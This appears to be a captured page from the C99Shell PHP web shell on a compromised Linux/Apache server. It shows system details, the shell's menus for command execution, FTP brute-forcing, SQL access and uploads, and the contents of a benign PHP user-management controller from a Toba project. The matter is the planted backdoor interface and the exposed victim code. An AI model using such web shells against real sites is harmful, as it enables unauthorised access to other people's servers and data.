!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1. PHP/7.4.29 

uname -a: Linux vps-2738122-x 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 

uid=1(daemon) gid=1(daemon) grupos=1(daemon) 

Safe-mode: OFF (not secure)

/opt/apex_tdfonline/proyectos/toba_usuarios/php/usuarios/   drwxr-xr-x
Free 14.61 GB of 61.93 GB (23.59%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ci_navegacion.php (2.47 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

class ci_navegacion extends toba_ci
{
    protected 
$s__filtro;

    
//-------------------------------------------------------------------
    //--- Eventos GLOBALES
    //-------------------------------------------------------------------
    
    
function evt__guardar()
    {
        
$this->dep('datos')->sincronizar();
        
$this->dep('datos')->resetear();
        
$this->set_pantalla('seleccionar');
    }

    function 
evt__cancelar()
    {
        
$this->dep('datos')->resetear();
        
$this->set_pantalla('seleccionar');
    }

    function 
evt__agregar()
    {
        
$this->dep('editor')->limpiar_datos();
        
$this->set_pantalla('editar');
    }
    
    function 
evt__eliminar()
    {
        
$this->dep('datos')->eliminar();
        
$this->dep('datos')->resetear();
        
$this->set_pantalla('seleccionar');
    }
    
    function 
conf__seleccionar()
    {
        
$this->dep('filtro')->desactivar_efs(array('asociados'));
    }

    
//---- filtro -------------------------------------------------------

    
function evt__filtro__filtrar($datos)
    {
        
$this->s__filtro $datos;
    }

    function 
evt__filtro__cancelar()
    {
        unset(
$this->s__filtro);
    }

    function 
conf__filtro($componente)
    {
        if (isset(
$this->s__filtro)) {
            
$componente->set_datos($this->s__filtro);
        } 
    }
    
    
//---- cuadro -------------------------------------------------------

    
function conf_evt__cuadro__eliminar(toba_evento_usuario $evt)
    {
        
$usuario $evt->get_parametros();
        if (
$usuario == toba::usuario()->get_id()) {
            
$evt->anular();    
        }
    }
    
    function 
conf__cuadro($componente)
    {
        if (isset(
$this->s__filtro)) {
            
$proyecto $this->s__filtro['proyecto'];
            switch (
$this->s__filtro['pertenencia']){
                case 
'P' :
                    
$datos consultas_instancia::get_usuarios_vinculados_proyecto($proyecto$this->s__filtro);
                    break;
                case 
'N' :
                    
$datos consultas_instancia::get_usuarios_no_vinculados_proyecto($proyecto$this->s__filtro);
                    break;
                case 
'T':
                    
$datos consultas_instancia::get_lista_usuarios($this->s__filtro);
                    break;
                case 
'S' :
                    
$datos consultas_instancia::get_usuarios_no_vinculados_proyecto(null$this->s__filtro);
                    break;
            }
            
$componente->set_datos($datos);
            
$componente->desactivar_modo_clave_segura();
        }
    }
    
    function 
evt__cuadro__seleccion($id)
    {
        
$this->dep('editor')->limpiar_datos();
        
$this->dep('datos')->cargar($id);
        
$this->set_pantalla('editar');
    }

    function 
evt__cuadro__eliminar($id)
    {
        
$this->dep('datos')->cargar($id);
        
$this->evt__eliminar();    
    }
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 1.032 ]--